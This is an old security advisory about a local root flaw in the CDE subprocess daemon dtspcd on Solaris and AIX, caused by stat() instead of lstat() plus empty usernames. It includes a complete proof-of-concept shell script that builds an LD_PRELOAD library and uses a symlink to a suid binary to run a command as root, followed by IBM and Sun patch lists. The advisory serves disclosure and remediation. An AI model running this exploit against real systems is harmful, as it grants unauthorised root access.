COMMAND
dtspcd
SYSTEMS AFFECTED
Solaris 2.x, 7, AIX, 4.1.x, 4.2.x, 4.3.x
PROBLEM
Job de Haas found following. He discovered the following security
problem in dtspcd, part of CDE. The CDE subprocess daemon
/usr/dt/bin/dtspcd contains an insufficient check on client
credentials. The insufficient check can lead to a local root
compromise.
The CDE subprocess daemon allows cross-platform invocation of
applications. To achieve this it is registered by inetd:
dtspc stream tcp nowait root /usr/dt/bin/dtspcd /usr/dt/bin/dtspcd
dtspc 6112/tcp # CDE subprocess control
In order to authenticate the remote user, the daemon generates a
filename which is to be created by the client and then is verified
by the daemon. When verifying the created file, the daemon uses
stat() instead of lstat() and is subsequently vulnerable to a
symlink attack. Further more the daemon seems to allow empty
usernames and then reverts to a publicly write-able directory
(/var/dt/tmp). Job discovered this accidentally, but later read
that also unreadable home directories result in this behavior.
The process can be followed fairly well by setting the -log and
-debug options on dtspcd (in /etc/inetd.conf). It will create a
log file in /var/dt/tmp/DTSPCD.log. This will show information
like:
--> REGISTER channel: 0, request: 4, length: 33, seq: 1 data: 4
Client protocol version is '1000'.: Mon Sep 13 10:32:33 1999
+++> Authentication file is '/var/dt/tmp/.SPC_AAA0RIUwK'.: Mon Sep 13 ..
Both these bugs can be combined to convince dtspcd it should
execute an action as root. The script below performs all
necessary actions on a Solaris host. It makes use of the dtaction
command of which the behavior is modified by pre-loading a shared
library with modified libc functions.
Another feature of dtspcd, which was not obvious to me, is that it
will allow remote access to all systems that share NFS exported
home directories without requesting a password. Shell script:
#!/bin/sh
#
# dtspaced
# Demonstration of local root hole with dtspcd.
# Job de Haas
# (c) 1999 ITSX bv
#
# Mechanism is as follows:
# - dtaction requests the action 'Execute' through dtspcd.
# - dtscpd request a filename to be created which it will check for
# owner/suid bit.
# - BUG1: dtspcd allows creation in a public directory (with empty
# username).
# - BUG2: and forgets to check if the file is a symlink.
# - dtaction will create a symlink to a suid root binary and reply.
# - dtspcd considers dtaction authenticated and executes requested file
# as root.
#
# suggested fix: use lstat or refuse a symlink and why allow an empty
# username?
#
# exploit uses a shared lib to replace some functions to do what we want.
# Note that these are not used by dtspcd but by dtaction. The script executed
# by dtaction as root creates a file /tmp/root_was_here.
#
# tested on Solaris 2.5.1, 2.6 and 7
#
if [ -f /tmp/root_was_here -o -d /tmp/root_was_here ]; then
echo "/tmp/root_was_here already exists"
exit
fi
if [ "X$DISPLAY" = "X" ]; then
echo "need to set DISPLAY"
exit
fi
cat > /tmp/dtspaced.c << EOF
#include <pwd.h>
#define O_CREAT 0x100
#define O_RDONLY 0
#if __SunOS_5_5_1
#define open64 open
#define _open64 _open
#endif
open64(const char * filename, int flag, int mode)
{
if ((flag & O_CREAT) && ( strstr( filename, "SPC") )) {
symlink( "/usr/bin/passwd", filename);
filename = (char *)strdup("/tmp/shit");
unlink(filename);
}
return(_open64(filename, flag, mode));
}
chmod(const char * filename, int mode)
{
_chmod( filename, mode);
return(0);
}
struct passwd *getpwuid(uid_t uid)
{
struct passwd *pw;
pw = (struct passwd *)_getpwuid(uid);
pw->pw_name = (char *)strdup("");
return(pw);
}
EOF
cat > /tmp/doit << EOF
#!/bin/sh
unset LD_PRELOAD
/usr/bin/touch /tmp/root_was_here
EOF
chmod a+x /tmp/doit
mkdir /tmp/.dt
cat > /tmp/.dt/hack.dt << EOF
set DtDbVersion=1.0
ACTION Execute
{
LABEL Execute
TYPE COMMAND
WINDOW_TYPE NO_STDIO
EXEC_STRING \
"%(File)Arg_1"File To Execute:"%"
DESCRIPTION The Execute action runs a shell script or \
binary executable. It prompts for options and \
arguments, and then executes the script or \
executable in a terminal window.
}
EOF
DTDATABASESEARCHPATH=/tmp/.dt
export DTDATABASESEARCHPATH
# make a copy of dtaction so it is not suid root and will accept LD_PRELOAD
cp /usr/dt/bin/dtaction /tmp
echo "Compiling shared lib..."
cc -c /tmp/dtspaced.c -o /tmp/dtspaced.o
ld -G /tmp/dtspaced.o -o /tmp/dtspaced.so
LD_PRELOAD=/tmp/dtspaced.so
export LD_PRELOAD
echo "Executing dtaction..."
/tmp/dtaction -execHost 127.0.0.1 Execute /tmp/doit
unset LD_PRELOAD
/bin/rm -f /tmp/doit /tmp/dtaction /tmp/shit /tmp/dtspaced.*
/bin/rm -rf /tmp/.dt
if [ -f /tmp/root_was_here ]; then
echo "created file /tmp/root_was_here"
else
echo "exploit failed..."
fi
SOLUTION
IBM
===
The following APARs will be available soon:
AIX 4.1.x: IY03125 IY03847
AIX 4.2.x: IY03105 IY03848
AIX 4.3.x: IY02944 IY03849
Customers that do not require the CDE desktop functionality can
disable CDE by restricting access to the CDE daemons and removing
the dt entry from /etc/inittab. For customers that require the
CDE desktop functionality, a temporary fix is available via
anonymous ftp from:
ftp://aix.software.ibm.com/aix/efixes/security/cdecert.tar.Z
Sun Microsystems
================
The following patches are available:
CDE version SunOS version Patch ID
___________ _____________ _________
1.3 5.7 108221-01
1.3_x86 5.7_x86 108222-01
1.2 5.6 108199-01
1.2_x86 5.6_x86 108200-01
1.0.2 5.5.1, 5.5, 5.4 108205-01
1.0.2_x86 5.5.1_x86, 5.5_x86, 5.4_x86 108206-01
1.0.1 5.5, 5.4 108252-01
1.0.1_x86 5.5_x86, 5.4_x86 108253-01
Santa Cruz Operation (SCO) and SGI are investigating the issue.